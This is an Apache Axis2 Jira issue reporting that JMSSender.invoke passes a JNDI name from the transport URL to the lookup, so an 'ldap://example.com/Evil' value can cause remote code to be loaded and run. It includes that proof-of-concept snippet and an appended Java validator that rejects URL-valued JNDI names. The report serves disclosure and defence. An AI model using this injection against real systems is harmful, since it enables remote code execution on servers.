Letian Yuan created AXIS2-6062:
----------------------------------

             Summary: Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol in `JMSSender`?
                 Key: AXIS2-6062
                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
             Project: Axis2
          Issue Type: Bug
          Components: JMS transport
    Affects Versions: 1.8.2
            Reporter: Letian Yuan


In "org.apache.axis2:axis2-transport-jms", there is a method, 
`org.apache.axis2.transport.jms.JMSSender.invoke`, designed to send a 
JMS message. However, if we send a JMS message like this:

    import org.apache.axis2.context.MessageContext;
    import org.apache.axis2.transport.jms.JMSSender;

    MessageContext context = new MessageContext();
    // The JNDI name of the connection factory is taken straight from the transport URL
    context.setProperty("TransportURL",
        "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");
    JMSSender sender = new JMSSender();
    sender.invoke(context);

Then arbitrary commands from the remote server "ldap://example.com/Evil" would be 
executed.

We want to discuss it with you.

First, executing arbitrary commands from a remote server is quite dangerous.

Second, as far as we know, no one would use the LDAP protocol to get a 
`ConnectionFactory`.

Third, it seems this behavior has not been documented in your “User’s Guide”, so 
library users might not know that this API for sending JMS messages can be used to 
execute arbitrary commands. So, I think it is very possible that library users will 
misuse this API, for example by concatenating user input into the parameter of 
`invoke`, or by making the parameter of `invoke` configurable in a file such as 
`foobar.properties`. We know that such cases rarely happen and might not be your 
design purpose, but it is possible anyway. As long as an attacker can control the 
parameter of `invoke`, remote code injection might happen.

Therefore, we want to ask you whether this is your design purpose and whether 
support for the LDAP protocol (and RMI, JRMP, etc.) is necessary.

This is just our opinion, and we are willing to discuss it with you.
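A caller-side guard for the `TransportURL` string, added here as an example that is not part of this issue or of Axis2: it rejects any `*JNDIName` parameter whose value carries a URL scheme before the URL ever reaches `JMSSender.invoke`. It assumes Java 11+ and that every JNDI-name parameter key ends in `JNDIName`, as `transport.jms.ConnectionFactoryJNDIName` does.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

public final class JmsTransportUrlGuard {
    // A JNDI name looked up through the local InitialContext should be a plain compound
    // name such as "ConnectionFactory" or "jms/QueueConnectionFactory". A value that starts
    // with a URL scheme (ldap:, rmi:, ...) would point the lookup at a remote naming service.
    private static final Pattern URL_SCHEME = Pattern.compile("^[A-Za-z][A-Za-z0-9+.-]*:");

    // Returns true only if the transport URL carries no URL-valued *JNDIName parameter.
    public static boolean isSafeTransportUrl(String transportUrl) {
        URI uri;
        try {
            uri = new URI(transportUrl);
        } catch (URISyntaxException e) {
            return false; // unparsable input is rejected rather than passed on
        }
        if (!"jms".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String query = uri.getRawQuery();
        if (query == null || query.isEmpty()) {
            return true;
        }
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            // Decode both halves so a percent-encoded scheme ("ldap%3A//...") is caught too.
            String key = URLDecoder.decode(eq < 0 ? pair : pair.substring(0, eq), StandardCharsets.UTF_8);
            String value = eq < 0 ? "" : URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8);
            // Assumption: every JNDI-name parameter's key ends in "JNDIName", as
            // transport.jms.ConnectionFactoryJNDIName does.
            if (key.endsWith("JNDIName") && URL_SCHEME.matcher(value.trim()).find()) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed inputs: the URL from the issue and a benign local JNDI name.
        System.out.println(isSafeTransportUrl(
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil"));
        System.out.println(isSafeTransportUrl(
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=jms/QueueConnectionFactory"));
    }
}
```

Call `isSafeTransportUrl` on any externally influenced value before `context.setProperty("TransportURL", ...)`, and treat a `false` result as a rejected request rather than falling back to a default factory.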



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
